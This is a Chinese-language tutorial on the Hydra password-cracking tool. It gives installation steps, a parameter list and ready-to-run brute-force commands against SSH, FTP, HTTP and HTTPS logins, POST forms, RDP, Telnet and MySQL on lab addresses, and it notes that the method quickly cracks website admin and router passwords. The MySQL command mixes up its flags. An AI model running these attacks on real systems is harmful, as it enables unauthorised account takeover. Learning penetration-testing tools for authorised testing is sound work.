hydra是一款强大的密码破解工具,又名九头蛇,支linux,windows,mac等多平台。并且支持多种密码协议的破解,本文带领大家一起来学习吧!
安装在kali中,hydra已经默认安装。我们终端输入命令hydra即可运行。当然其他系统也可以安装。
代码语言:javascript代码运行次数:0运行复制apt-get install hydra
yum install hydra
常用参数-l 指定用户名进行破解-L 指定用户的用户名字典-p 用于指定密码破解-P 用于指定密码字典。-M 指定目标ip列表文件,批量破解。-o 指定结果输出文件-t 同时运行的线程数,默认是16-w 设置最大超时时间,单位-v 显示详细过程-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)-x 自定义密码。牛刀小试破解ssh
代码语言:javascript代码运行次数:0运行复制hydra -L user.txt -P pass.txt -t 10 -o save.log -vV 192.168.123.1 ssh
如上,我们得到了ssh的账号和密码均为admin
破解ftp
代码语言:javascript代码运行次数:0运行复制hydra ftp://192.168.123.173 -L user.txt -P pass.txt -t 10 -vV
web后台登录
代码语言:javascript代码运行次数:0运行复制hydra -L user.txt -P pass.txt -t 10 -vV -e ns 192.168.123.1 http-get
利用这种方法,我们可以快速的破解网站后台密码或者路由器登录密码。如果网站后台是http://xxx.com/admin我们需要在上面的命令后面添加参数 /admin
HTTPS 破解
现在很多的站点都支持https。因此我们需要下面的命令。
代码语言:javascript代码运行次数:0运行复制hydra -m /admin -L user.txt -P pass.txt 192.168.123.1 https
POST请求
post请求相对前面比较麻烦,我们需要简单的分析post的数据结构。
代码语言:javascript代码运行次数:0运行复制hydra -t 3 -L user.txt -P pass.txt -o out.txt -f 192.168.123.173 -s 8888 http-post-form "/:id=^USER^&passwd=^PASS^:wrong username or password"
效果如下:
rdp(远程桌面)
代码语言:javascript代码运行次数:0运行复制hydra 192.168.123.15 rdp -l administrator -P pass.txt -V
telnet 破解
代码语言:javascript代码运行次数:0运行复制hydra 192.168.123.173 telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
mysql 破解
代码语言:javascript代码运行次数:0运行复制hydra -l root –p pass.txt –e ns 127.0.0.1 mysql
BREAK AWAY